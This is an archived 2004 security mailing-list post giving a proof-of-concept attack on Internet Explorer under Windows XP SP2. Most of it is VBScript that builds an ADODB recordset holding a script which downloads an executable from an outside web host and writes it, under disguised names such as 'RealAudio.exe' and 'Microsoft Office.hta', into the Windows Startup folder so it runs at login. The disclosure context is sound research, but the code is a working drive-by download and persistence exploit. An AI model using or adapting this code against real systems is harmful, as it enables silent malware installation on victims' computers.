Re: YET AGAIN Automatic remote compromise of Internet Explorer Service Pack 2 XP SP2

"Michael Evanchik" <[email protected]>
Newsgroups gmane.comp.security.vulnerabilities.watch.announce
Organization MichaelEvanchik.com
Message-ID <038901c4ec66$ae3206f0$6702a8c0__40801.5601140962$1104190100$gmane$org@AlanPickel.com>
sorry there was a bug in the code.  I just fixed it now should work on everyone
  ----- Original Message ----- 
  From: Michael Evanchik 
  To: [email protected] ; [email protected] ; [email protected] ; [email protected] ; [email protected] 
  Cc: [email protected] ; [email protected] ; [email protected] 
  Sent: Monday, December 27, 2004 1:53 AM
  Subject: Re: YET AGAIN Automatic remote compromise of Internet Explorer Service Pack 2 XP SP2


  PoC: http://www.michaelevanchik.com/security/microsoft/ie/xss/index.html

  Here is some new adodb code AVP's should add.  No longer needed to connect to external source.  Malicious recordset can be built locally.

  on error resume next
  set evanchik = CreateObject("ADODB.Recordset")
     With objRS
         .Fields.Append "evanchik", 200, "3000"
         Call .Open
         Call .AddNew
         .Fields("evanchik").Value = "meaning less shit i had to put here"
         Call .AddNew
         .Fields("evanchik").Value = "<script language=vbscript>: on error resume next : set o = CreateObject(""msxml2.XMLHTTP"") : o.open ""GET"",""http://hometown.aol.com/mcbain/calc.exe"",False : o.send : set s = createobject(""adodb.stream"") : s.type=1 : s.open : s.write o.responseBody : s.savetofile ""C:\Documents and Settings\All Users\Start Menu\Programs\Startup\RealAudio.exe"",2 : </script>"
         Call .Update
     End With
  evanchik.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta", adPersistXML

  evanchik.Close
lmpx.com only provides a reader for public news (NNTP) servers. It is not affiliated with the servers or forums shown here and is not responsible for the content of articles, which is written by their respective authors.